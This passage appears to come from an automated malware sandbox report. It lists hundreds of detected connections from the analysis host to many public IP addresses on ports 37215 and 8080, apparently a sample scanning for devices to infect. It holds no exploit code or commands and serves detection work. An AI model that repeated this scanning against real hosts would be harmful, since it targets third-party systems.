                  Source: unknownNetwork traffic detected: HTTP traffic on port 51106 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46536 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40076 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46136 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58870 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36536 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51582 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35862 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58556 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45686 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54312 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37412 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48936 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45488 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60268 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48322 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46632 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39994 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33180 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51670 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41868 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42982 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44456 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56826 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43808 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34260 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42702 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50248 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40852 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56404 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57536 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33448 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54810 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38494 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56690 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50908 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35538 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58746 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57224 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60020 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33992 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56828 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40228 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57886 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48056 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46538 -> 37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.52.148.255:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.237.191.16:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.38.89.252:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 181.43.141.40:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.19.102.149:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 217.215.170.113:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.149.31.236:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.81.140.211:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.160.68.204:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.22.102.54:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 5.97.26.130:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.43.127.239:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.46.158.67:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 78.175.246.179:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.255.200.41:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.10.100.12:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 163.220.137.24:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 86.66.209.176:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.39.137.30:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.141.214.50:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.155.106.175:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.47.174.149:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.17.4.235:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 36.89.146.41:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.15.250.58:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.49.2.45:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 45.245.176.38:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.97.220.177:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 42.35.195.126:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.55.170.184:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 141.200.4.198:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.67.177.196:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.112.115.182:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.137.42.15:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.40.208.142:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.212.255.216:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.192.147.18:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 135.102.47.9:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.65.101.179:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 72.22.180.173:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.105.180.3:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.190.126.188:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.236.227.34:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 75.47.157.155:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.163.251.14:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 174.124.220.2:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.95.87.151:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 171.158.71.242:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.42.220.67:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.74.61.205:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.133.30.24:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.226.193.115:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 123.9.212.57:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.156.64.155:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.122.173.232:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.202.85.61:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.0.235.248:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 71.104.234.237:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.102.198.190:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.103.222.125:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.139.234.44:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.180.198.239:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 87.164.166.177:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.38.220.173:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.58.10.7:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.97.58.224:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.225.195.37:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.30.40.152:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.87.222.77:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 46.200.188.25:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 115.138.220.111:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 106.56.6.190:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.121.209.163:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.99.193.181:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 169.177.66.52:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.191.64.228:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.190.171.218:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.65.240.174:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.76.12.89:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.143.91.213:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.226.110.213:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.140.67.184:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.0.124.228:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.60.208.73:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.193.139.88:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.27.14.55:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.95.217.42:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.190.236.205:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 120.246.2.137:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.167.100.69:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.65.132.29:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.252.69.113:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 54.241.163.57:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.223.31.45:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 20.7.65.156:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.29.5.93:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.10.190.111:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 69.162.197.96:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.31.127.103:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.91.16.173:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.29.170.148:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 135.248.31.47:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.159.153.236:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.40.170.46:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.151.115.26:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.183.209.97:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.121.167.190:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 202.67.100.45:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.50.201.58:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 83.236.251.9:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.220.47.15:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 34.104.150.92:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.126.68.224:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.122.47.50:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.139.228.238:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.11.211.157:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.244.55.135:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.146.71.87:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.37.231.78:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.153.228.99:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.230.57.106:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.251.251.238:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.125.206.104:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.249.192.241:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 111.98.104.242:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.158.58.163:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.207.229.119:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.111.181.191:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.1.89.179:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.122.222.123:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.116.42.62:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.247.221.49:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.82.158.28:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.74.124.140:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.117.48.192:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.218.195.17:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.86.73.16:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 180.120.6.72:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.37.33.8:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 223.76.97.149:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.209.191.216:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.89.173.31:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.115.63.20:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 93.147.120.212:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.151.212.208:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.144.251.9:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.95.170.215:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.208.157.109:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 193.214.59.31:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 126.240.113.29:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.246.191.109:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 66.143.18.126:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.135.23.207:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.112.47.233:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 101.114.124.138:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.253.121.55:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.245.109.176:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.144.17.231:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.39.26.209:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.205.134.89:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.221.44.54:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.174.63.47:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.15.212.194:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.193.107.185:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 61.207.156.53:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.201.211.159:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.239.61.59:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.224.162.178:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.117.205.44:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.246.74.58:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 135.247.133.216:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.119.67.151:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.229.188.247:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.172.163.162:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.70.180.111:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.108.181.225:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.45.203.117:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.105.233.139:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 81.204.153.187:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.25.245.231:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.2.246.5:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.6.115.9:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.126.108.231:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.176.239.192:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.208.76.247:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.7.195.208:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.66.95.76:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.207.197.88:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 35.255.204.113:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.200.232.104:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.1.236.144:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.187.182.162:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.104.31.205:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.84.41.32:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 147.117.217.184:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.183.22.19:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.155.54.19:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 119.156.167.136:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.207.70.51:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.234.147.15:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.19.169.175:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.77.105.34:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.103.243.190:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 54.133.135.147:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.16.78.90:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.179.81.118:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.98.114.203:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.217.152.128:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.248.33.158:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 167.37.234.0:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.151.169.133:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.215.133.102:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.88.194.86:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.3.221.143:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.126.210.26:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.185.101.223:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.145.183.239:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.85.149.56:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.255.222.217:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.127.225.235:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 39.48.241.187:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 53.66.170.46:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.235.16.35:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.32.205.20:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 174.114.236.91:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.8.43.206:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.244.131.193:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.255.175.142:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.89.62.15:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.205.193.185:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.18.91.146:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.193.151.66:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.159.15.77:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.100.217.152:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.238.44.234:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 218.152.125.146:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.182.210.198:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.165.121.237:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 163.82.81.106:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 113.6.154.173:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 72.140.6.33:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.146.63.152:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.44.166.64:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.39.15.161:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.140.212.130:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 183.104.2.21:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 73.87.172.88:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.35.82.51:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 197.68.164.62:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 184.124.238.137:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 149.115.82.72:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.163.9.81:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.111.147.95:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 42.152.20.241:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 157.227.31.245:37215
                  Source: global trafficTCP traffic: 192.168.2.14:32495 -> 41.82.111.208:37215
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 39.12.148.255:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 42.46.21.79:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 45.187.132.255:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 112.13.28.18:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 132.82.168.228:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 146.233.150.253:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 181.250.176.43:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 146.165.45.244:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 87.150.168.115:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 134.42.254.174:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 110.206.178.218:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 89.138.30.97:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 188.146.35.63:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 125.13.253.147:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 32.131.231.66:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 121.39.183.241:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 113.146.95.26:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 106.128.102.167:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 35.105.125.185:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 118.34.0.209:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 111.157.198.74:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 141.184.25.192:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 165.248.11.160:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 154.169.147.2:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 184.99.243.221:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 199.134.225.225:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 186.29.227.181:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 130.249.253.178:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 170.174.128.177:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 42.223.21.161:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 202.90.11.42:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 20.17.108.178:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 69.84.220.24:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 48.44.62.124:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 200.225.91.98:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 47.31.117.28:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 64.100.188.198:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 221.61.8.3:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 178.2.42.85:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 113.177.185.175:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 50.170.17.160:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 96.56.113.164:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 122.192.124.1:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 212.230.121.150:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 81.102.236.217:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 221.64.87.116:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 70.230.238.121:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 37.39.254.226:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 181.45.15.244:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 23.174.244.145:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 138.171.246.208:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 131.88.242.15:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 108.99.46.16:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 67.232.189.194:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 43.216.15.80:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 157.194.189.29:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 89.72.221.174:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 209.39.255.19:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 95.1.198.63:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 206.56.70.24:8080
